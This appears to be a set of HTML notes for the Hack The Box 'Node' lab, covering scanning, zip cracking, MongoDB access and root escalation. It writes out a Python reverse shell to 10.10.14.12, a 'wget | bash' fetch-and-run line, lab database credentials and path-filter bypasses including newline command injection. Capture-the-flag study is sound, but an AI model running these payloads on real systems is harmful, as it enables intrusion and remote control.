<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Node [MongoDB PrivEsc and Path string Filter Bypass]</title>
</head><body><span style="font-size: 12pt"><span style="font-family: Menlo"><br/>
<br/>
<br/>
<br/>
<b><br/>
<br/>
</b><b>&gt; Basic Scan: </b><br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Menlo">nmap -sC -sV -O -oA initial 10.10.10.58</span></span><ul><li><b>-sC</b>: run default nmap scripts</li>
<li><b>-sV</b>: detect service version</li>
<li><b>-O</b>: detect OS</li>
</ul>
<ul><b>-oA</b>: output all formats and store in file <i>initial</i></ul>
<i><br/>
</i><br/>
<span style="font-family: Menlo"><span style="font-size: 12pt">&gt; nmap -sC -sV -p- -oA full 10.10.10.58</span></span><br/>
&nbsp;<br/>
<br/>
<b><span style="font-size: 12pt">&gt; Convert any text to SHA256: </span></b>Aslo can be used to verify if passwords are salted or not.<br/>
echo -n "TEXT" | sha256sum<br/>
S<br/>
<span style="font-size: 12pt"><b>&gt; Base64 Decode:</b></span><br/>
cat myplace.backup | base64 --decode &gt; myplace-decoded.backup<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Checking file type:</b></span><br/>
file myplace-decoded.backup <br/>
<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Cracking ZIP files:</b></span><br/>
fcrackzip -u -v -D -p wordlist-dict.txt example.zip (dictionary attack)<br/>
fcrackzip -u -v -l 1-6 -c a example.zip<br/>
fcrackzip -u -v -l 1-6 -c aA1 example.zip<br/>
<br/>
&nbsp;<br/>
<b>Switch Explanation:</b><ul><li>-v : verbose output, display the progress of current crack, may slow the progress a little bit</li>
<li>-l : length of password to brute-force in this case (1 to 6 characters)</li>
<li>-c : character set to try (a – lower-alphabet, A-uppercase alphabet, 1-numeric, ! – include [!:$%&amp;/()=?[]+*~#])</li>
<li>-u : verify the zip password in case of multiple possible matches</li>
</ul>
&nbsp;<br/>
<span style="font-size: 12pt"><b>&gt; Unzip ZIP file have a password:</b></span><br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">unzip -P magicword myplace-decoded.backup<br/>
<br/>
<br/>
<br/>
<br/>
</span></span><br/>
<span style="font-size: 12pt"><b>&gt; Search for a Password phrase in a Directory and Files:</b></span><br/>
grep -Ri password . | less <br/>
<br/>
<br/>
<b><span style="font-size: 12pt">&gt; Starting HTTP Server:</span></b><br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">python -m SimpleHTTPServer 5555</span></span><br/>
&nbsp;<br/>
<b><span style="font-size: 12pt">&gt; To start a Script on the fly:</span></b><br/>
wget http://IP/file | bash<br/>
<br/>
<br/>
<b><span style="font-size: 12pt">&gt; MongoDB structure compared to RDBMS:</span></b><br/>
<a href="https://www.includehelp.com/mongodb/a-deep-dive-into-mongo-database.aspx">https://www.includehelp.com/mongodb/a-deep-dive-into-mongo-database.aspx</a>&nbsp; <br/>
<br/>
<b>RDBMS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MongoDB<br/>
</b>Database &nbsp; &nbsp;&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Database<br/>
Tables &nbsp; &nbsp; &nbsp; &nbsp; &gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Collections<br/>
Rows &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Documents<br/>
Column &nbsp; &nbsp; &nbsp; &gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Fields<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; MongoDB connection String in app.js</b></span><br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&amp;authSource=scheduler';<br/>
</span></span><span style="font-family: Menlo"><span style="font-size: 10pt">authSource=scheduler'</span></span>&nbsp;&gt;&gt;&gt; This is the Database name<br/>
&nbsp;<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Exploitation Methodology:</b></span><br/>
We login using mark’s credentials and access the scheduler database.<br/>
The set interval function seems to be checking for documents (equivalent to rows) in the tasks collection (equivalent to tables).<br/>
For each document it executes the cmd field. <br/>
Since we do have access to the database, we can add a document that contains a reverse shell as the cmd value to escalate privileges.<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Connecting to Local MongoDB:</b></span><br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<b># Lists the database name</b><br/>
&gt; db<br/>
scheduler &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
<b># Shows all the tables in the database - equivalent to 'show tables'</b><br/>
&gt; show collections<br/>
tasks &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
<b># List content in tasks table - equivalent to 'select * from tasks'</b><br/>
</span></span><span style="font-size: 10pt"><span style="font-family: Menlo">&gt; db.tasks.find()</span>&nbsp; <br/>
<br/>
</span><b><span style="font-size: 13pt">Privilege Escalation:</span></b><span style="font-size: 10pt"><br/>
</span><span style="font-size: 12pt"><b>Method 1:</b></span><span style="font-size: 10pt"><br/>
</span><span style="font-size: 10pt"><span style="font-family: Menlo"><b># insert document that contains a reverse shell</b><br/>
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.12\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})<br/>
<br/>
<b># double check that the document got added properly.</b><br/>
db.tasks.find()<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
</span></span><span style="font-family: Menlo"><span style="font-size: 12pt"><b><br/>
</b></span><span style="font-size: 12pt"><b>Method 2:</b></span><span style="font-size: 10pt"><br/>
</span><span style="font-size: 10pt"><br/>
</span></span>db.tasks.insertOne( { cmd: "bash /tmp/shell.sh" ]);<br/>
<br/>
Note: shell.sh contains a Python one-liner reverse shell<br/>
<br/>
<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Get a TTY shell:</b></span><br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">python -c 'import pty; pty.spawn("/bin/bash")'</span></span><br/>
<br/>
<b>This gives us a partially interactive bash shell. To get a fully interactive shell, background the session <span style="font-size: 11pt">(CTRL+ Z) </span>and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.This gives us a partially </b><br/>
<br/>
<span style="font-family: Menlo"><span style="font-size: 10pt">stty raw -echo</span></span>&nbsp;<br/>
<b>Once that is done, run the command <span style="font-size: 12pt">“fg”</span>&nbsp;to bring netcat back to the foreground.</b><br/>
<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; SUIDS:</b></span><br/>
If SUID bit is set for a file, it will execute that with the level of privilege that matches the user who owns the file.<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Uncompress a file with 7z:<br/>
</b></span>7z x file_name<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Check what the binary commands being called:</b></span><br/>
<b>ltrace</b>&nbsp;program to see what system commands are getting called when we run the backup program.<br/>
<br/>
<span style="font-size: 12pt"><b>&gt; Bypassing a Program that filtering the directory path string<br/>
<br/>
</b></span><span style="font-size: 10pt">1- Use Wildcards : Example /r**t/r**t.txt &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;|||||| &nbsp; &nbsp; </span>The * character is not filtered in the program, therefore we can use it to make a backup of the root directory.<br/>
<span style="font-size: 10pt"><br/>
</span><span style="font-size: 10pt">2- </span><b> </b>Using the Home Variable<span style="font-size: 10pt">&nbsp; ~ : <span style="font-family: Menlo">export HOME=/root</span>&nbsp; &nbsp; &nbsp; &nbsp;|||||| &nbsp; &nbsp; &nbsp;If &nbsp;~ character is not filtered either, so we can make use of it to make a backup of the root directory.</span><b><span style="font-size: 12pt"><br/>
</span></b><b><span style="font-size: 12pt"><br/>
</span></b><span style="font-size: 10pt">3- Using Symlinks [</span>A symbolic link is a file that points to another file<span style="font-size: 10pt">] : Then, call the backup program with the link file.<br/>
</span><br/>
<span style="font-size: 10pt">Let’s point the root.txt file to a file called alt-file.txt.<br/>
</span><b><span style="font-size: 12pt"><br/>
</span></b><span style="font-family: Menlo"><span style="font-size: 10pt">tom@node:/tmp$ mkdir altdir<br/>
tom@node:/tmp$ cd altdir/<br/>
</span></span><span style="font-family: Menlo"><span style="font-size: 10pt">tom@node:/tmp/altdir$ ln -s /root/root.txt altfile</span></span><ul><li><b>-s:</b> make symbolic links instead of hard links</li>
</ul>
<br/>
<br/>
&nbsp;4- Command Injection: &nbsp;By using printf to force a new line in the command, the system function call in the C program will execute whatever proceeds it as a separate command.<br/>
<br/>
"$(printf 'aaa\n/bin/sh\nls')" &nbsp;<br/>
<a href="https://rastating.github.io/hackthebox-node-walkthrough/">https://rastating.github.io/hackthebox-node-walkthrough/</a><span style="font-size: 12pt"><b>&nbsp; <br/>
</b></span><br/>
<br/>
</body></html>